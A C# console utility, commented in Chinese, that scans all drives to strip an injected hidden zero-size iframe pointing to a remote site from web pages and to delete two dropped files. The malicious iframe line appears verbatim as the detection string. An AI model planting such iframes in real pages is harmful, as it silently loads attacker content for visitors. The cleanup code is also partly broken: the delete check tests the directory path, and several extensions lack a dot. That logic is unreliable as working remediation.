﻿/* ==============================================================================
   * 文 件 名:Program
   * 功能描述：
   * Copyright (c) 2013 武汉经纬视通科技有限公司
   * 创 建 人: alone
   * 创建时间: 2013/3/24 21:13:47
   * 修 改 人: 
   * 修改时间: 
   * 修改描述: 
   * 版    本: v1.0.0.0
   * ==============================================================================*/
using System;
using System.Collections.Generic;
using System.IO;
using System.Text;

namespace HTML_IFrame_laka文件还原
{
    class Program
    {
        public static string[] files;//需要删除的文件
        public static string[] exts;//需要替换错误代码的文件后缀
        public static int count = 0;//已处理文件数量
        public static StringBuilder handledFiles = new StringBuilder();
        //错误代码
        public static string errorCode = "<iframe src=\"http://www.xinxinbaidu.com.cn/htm/mm.htm\" width=0 height=0></iframe>";
        public static string logName;//日志文件

        static void Main(string[] args)
        {
            //设置参数
            logName = ".//" + DateTime.Now.ToString("yyyy年MM月dd日") + ".log";
            files = new string[] { "Desktop_1.ini", "cool_gamesetup.exe" };
            exts = new string[] { ".aspx", "jsp", "html", "htm", "shtml" };
            handledFiles.AppendLine("已处理文件列表:");
            //遍历驱动器 
            var drives = Directory.GetLogicalDrives();
            foreach (var drive in drives)
            {
                Handle(drive);
            }
            //Handle("C://");
            Write("已处理文件总数:" + count);
            Write(handledFiles.ToString());
            Console.WriteLine("程序处理完毕");
            Console.ReadKey();
        }

        static void Handle(string path)
        {
            Console.WriteLine("处理目录 " + path);
            //移除文件中的错误代码
            var files = Directory.GetFiles(path);
            foreach (var file in files)
            {
                var currExt = Path.GetExtension(file);
                foreach (var ext in Program.exts)
                {
                    if (ext == currExt)
                    {
                        try
                        {
                            //获取该文件的编码 用该编码进行文件读写
                            var encode = TxtFileEncoding.GetEncoding(file);
                            var content = File.ReadAllText(file, encode);
                            if (content.Contains(errorCode))
                            {
                                content = content.Replace(errorCode, string.Empty);
                                File.WriteAllText(file, content, encode);
                                Console.WriteLine("修改成功 文件编码:{0} 文件路径:{1}", encode.BodyName, file);
                                //记录修改信息
                                count++;
                                handledFiles.AppendLine(file);
                            }
                        }
                        catch (Exception e)
                        {
                            Console.WriteLine("修改失败 {0}  {1}", file, e.Message);
                            Write(e.Message);
                        }
                    }
                }
            }
            //删除指定文件
            foreach (var file in Program.files)
            {
                var deleteFile = Path.Combine(path, file);
                if (File.Exists(path))
                {
                    FileInfo flDeleteFile = new FileInfo(Path.Combine(path, file));
                    flDeleteFile.IsReadOnly = false;
                    flDeleteFile.Attributes = FileAttributes.Normal;
                    flDeleteFile.Delete();
                    Console.WriteLine("删除{0}成功", file);
                }
            }
            //递归文件夹
            var dirs = Directory.GetDirectories(path);
            foreach (var dir in dirs)
            {
                try
                {
                    Handle(dir);
                }
                catch (Exception e)
                {
                    Console.WriteLine("目录处理失败 {0}", dir);
                    Write(e.Message);
                }
            }
        }

        static void Write(string msg)
        {
            var content = new StringBuilder();
            content.AppendLine("【记录时间】" + DateTime.Now.ToString());
            content.AppendLine("【错误信息】" + msg);
            File.AppendAllText(logName, content.ToString() + Environment.NewLine);
        }
    }
}
